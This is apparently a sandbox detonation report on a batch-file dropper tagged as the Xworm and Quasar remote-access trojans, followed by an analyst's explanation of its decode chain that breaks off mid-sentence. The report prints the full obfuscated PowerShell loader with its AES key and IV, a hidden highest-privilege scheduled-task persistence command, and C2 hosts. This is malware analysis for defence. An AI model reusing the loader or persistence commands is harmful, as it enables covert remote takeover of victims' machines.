Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4992 wrote to memory of 1492 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4992 wrote to memory of 1492 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 2116 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 2116 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 3132 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WScript.exe
PID 1492 wrote to memory of 3132 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WScript.exe
PID 3132 wrote to memory of 3164 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\system32\cmd.exe
PID 3132 wrote to memory of 3164 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 2208 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3164 wrote to memory of 2208 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2208 wrote to memory of 3636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe
PID 2208 wrote to memory of 3636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IMGBAJCtblcDTdjuAM5M1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rYugK=New-Object System.IO.MemoryStream(,$param_var); $FsizC=New-Object System.IO.MemoryStream; $qQyLB=New-Object System.IO.Compression.GZipStream($rYugK, [IO.Compression.CompressionMode]::Decompress); $qQyLB.CopyTo($FsizC); $qQyLB.Dispose(); $rYugK.Dispose(); $FsizC.Dispose(); $FsizC.ToArray();}function execute_function($param_var,$param2_var){ $YdjZT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WGHne=$YdjZT.EntryPoint; $WGHne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$tUlfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Client-built.bat').Split([Environment]::NewLine);foreach ($opvFd in $tUlfv) { if ($opvFd.StartsWith(':: ')) { $vKkrO=$opvFd.Substring(3); break; }}$payloads_var=[string[]]$vKkrO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_880_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_880.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_880.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_880.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IMGBAJCtblcDTdjuAM5M1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rYugK=New-Object System.IO.MemoryStream(,$param_var); $FsizC=New-Object System.IO.MemoryStream; $qQyLB=New-Object System.IO.Compression.GZipStream($rYugK, [IO.Compression.CompressionMode]::Decompress); $qQyLB.CopyTo($FsizC); $qQyLB.Dispose(); $rYugK.Dispose(); $FsizC.Dispose(); $FsizC.ToArray();}function execute_function($param_var,$param2_var){ $YdjZT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WGHne=$YdjZT.EntryPoint; $WGHne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_880.bat';$tUlfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_880.bat').Split([Environment]::NewLine);foreach ($opvFd in $tUlfv) { if ($opvFd.StartsWith(':: ')) { $vKkrO=$opvFd.Substring(3); break; }}$payloads_var=[string[]]$vKkrO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

"C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 express-divorce.gl.at.ply.gg udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 8.8.8.8:53 18.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 8.8.8.8:53 traffic-collins.gl.at.ply.gg udp
US 147.185.221.19:24820 traffic-collins.gl.at.ply.gg tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 17.143.109.104.in-addr.arpa udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp

Files

memory/1492-1-0x00000250F8760000-0x00000250F8782000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1ww5ii4l.rff.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1492-4-0x00000250DE010000-0x00000250DE020000-memory.dmp

memory/1492-12-0x00000250DE010000-0x00000250DE020000-memory.dmp

memory/1492-0-0x00007FF81D0A0000-0x00007FF81DB61000-memory.dmp

memory/1492-13-0x00000250F89B0000-0x00000250F89B8000-memory.dmp

memory/1492-14-0x00000250F89C0000-0x00000250F8AFA000-memory.dmp

memory/2116-16-0x00007FF81D0A0000-0x00007FF81DB61000-memory.dmp

memory/2116-17-0x00000273372E0000-0x00000273372F0000-memory.dmp

memory/2116-18-0x00000273372E0000-0x00000273372F0000-memory.dmp

memory/2116-28-0x00000273372E0000-0x00000273372F0000-memory.dmp

memory/2116-29-0x00000273372E0000-0x00000273372F0000-memory.dmp

memory/2116-32-0x00007FF81D0A0000-0x00007FF81DB61000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f8d49a4af7a844bfc7247d5670def557
SHA1 26ae0ce194a77a7a1887cf93741293fdfa6c94c4
SHA256 61c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b
SHA512 9e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 661739d384d9dfd807a089721202900b
SHA1 5b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA256 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA512 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

C:\Users\Admin\AppData\Roaming\startup_str_880.vbs

MD5 cb82f6b4868c69302aa0f0d769cbc67e
SHA1 a0f5dfa79e967f926e43814fdb372c07f6dbe338
SHA256 952d59ec8eb7e2857dfecc5fb7b30483b67005962cf37ee22c33243976271f6c
SHA512 69819516721d4fa2224e4d710891290d7ef026c89ffbb4b5119491a15d383cda82c3ea46b2eb4681b53d0a0b87d06d5e79ec80afed2e4ea95eb4f2301e57a781

C:\Users\Admin\AppData\Roaming\startup_str_880.bat

MD5 566c653ae6a704041aef596fce6d6a8c
SHA1 da35608bf372a6113d941817a96bc3a17de9ef69
SHA256 950153a1ef5114d609ca8fa79a28374c1f24ae84a8f90ef0a21fb7914639b4e9
SHA512 98662e33f746dce81efe530f6544bf0d83eff2ff35d72bf54e105ef6de121108a4aa28d6e417d3c8e1584a5c0165f78b180574eaa489f11d7cd617b6d31e01c2

memory/2208-41-0x00007FF81D0A0000-0x00007FF81DB61000-memory.dmp

memory/2208-42-0x0000017340C50000-0x0000017340C60000-memory.dmp

memory/2208-43-0x0000017340C50000-0x0000017340C60000-memory.dmp

memory/1492-54-0x00007FF81D0A0000-0x00007FF81DB61000-memory.dmp

memory/2208-57-0x00000173432E0000-0x0000017343604000-memory.dmp

memory/2208-58-0x0000017340C50000-0x0000017340C60000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

MD5 dd466e4e324143a67a406797c23ee2bc
SHA1 cc369b99c18c9322734b14908e7b21f2bec48118
SHA256 1a87f2fed2a9263e703c44d25da8242016a640db930678a0f497879267c133c8
SHA512 603c082427129deac3bce210d87e3f4125dd429ad7fe13422b7a3d80f8e282ae8ad887a20e47de12a3f90c24ab4a143dc3b069fd8da122f4f96b70f94bd7f438

memory/3636-69-0x00007FF81D0A0000-0x00007FF81DB61000-memory.dmp

memory/3636-70-0x0000000000620000-0x000000000062E000-memory.dmp

memory/2208-71-0x0000017343C80000-0x0000017343CD0000-memory.dmp

memory/2208-72-0x0000017343D90000-0x0000017343E42000-memory.dmp

memory/2208-73-0x0000017344360000-0x0000017344522000-memory.dmp

memory/3636-74-0x000000001B410000-0x000000001B420000-memory.dmp

memory/2208-75-0x00007FF81D0A0000-0x00007FF81DB61000-memory.dmp

memory/2208-76-0x0000017340C50000-0x0000017340C60000-memory.dmp

memory/2208-77-0x0000017340C50000-0x0000017340C60000-memory.dmp

memory/2208-78-0x0000017340C50000-0x0000017340C60000-memory.dmp

memory/3636-79-0x00007FF81D0A0000-0x00007FF81DB61000-memory.dmp

memory/3636-80-0x000000001B410000-0x000000001B420000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-04-13 18:14

Reported

2024-04-13 18:16

Platform

win11-20240412-en

Max time kernel

60s

Max time network

70s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-825860316-2493133627-3905166409-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4980 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4980 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 4148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 4148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 5024 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 2284 wrote to memory of 5024 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 5024 wrote to memory of 5008 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 5024 wrote to memory of 5008 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 5008 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5008 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1532 wrote to memory of 3128 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe
PID 1532 wrote to memory of 3128 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IMGBAJCtblcDTdjuAM5M1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rYugK=New-Object System.IO.MemoryStream(,$param_var); $FsizC=New-Object System.IO.MemoryStream; $qQyLB=New-Object System.IO.Compression.GZipStream($rYugK, [IO.Compression.CompressionMode]::Decompress); $qQyLB.CopyTo($FsizC); $qQyLB.Dispose(); $rYugK.Dispose(); $FsizC.Dispose(); $FsizC.ToArray();}function execute_function($param_var,$param2_var){ $YdjZT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WGHne=$YdjZT.EntryPoint; $WGHne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$tUlfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Client-built.bat').Split([Environment]::NewLine);foreach ($opvFd in $tUlfv) { if ($opvFd.StartsWith(':: ')) { $vKkrO=$opvFd.Substring(3); break; }}$payloads_var=[string[]]$vKkrO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_134_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_134.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_134.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_134.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IMGBAJCtblcDTdjuAM5M1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rYugK=New-Object System.IO.MemoryStream(,$param_var); $FsizC=New-Object System.IO.MemoryStream; $qQyLB=New-Object System.IO.Compression.GZipStream($rYugK, [IO.Compression.CompressionMode]::Decompress); $qQyLB.CopyTo($FsizC); $qQyLB.Dispose(); $rYugK.Dispose(); $FsizC.Dispose(); $FsizC.ToArray();}function execute_function($param_var,$param2_var){ $YdjZT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WGHne=$YdjZT.EntryPoint; $WGHne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_134.bat';$tUlfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_134.bat').Split([Environment]::NewLine);foreach ($opvFd in $tUlfv) { if ($opvFd.StartsWith(':: ')) { $vKkrO=$opvFd.Substring(3); break; }}$payloads_var=[string[]]$vKkrO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

"C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe"
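The two loader command lines above (pid 2284 reading Client-built.bat, pid 1532 reading the copy dropped as startup_str_134.bat, which the Files section shows carries the same SHA256 as the original sample) share one decode chain: take the first line of the carrier .bat that starts with ':: ' (a batch comment, so cmd.exe skips it), split it on '\', Base64-decode each half, AES-CBC/PKCS7-decrypt it with the 32-byte key and 16-byte IV hardcoded in the command line, GZip-inflate the result and hand it to Assembly.Load, then call the assembly's EntryPoint (payload 1 with no arguments, payload 2 with an empty string[]). The .NET member names are written backwards and reversed with [-1..-N] -join '' so that FromBase64String, ReadAllText and Load never appear literally. Because the key and IV travel with the loader, both payloads can be recovered without executing anything. The script below is an added example, not the sandbox's or the malware author's code, that does that in Python. It assumes the cryptography package is installed; SAMPLE_CMDLINE is a set of fragments copied from the command line above, and SAMPLE_BAT is a constructed 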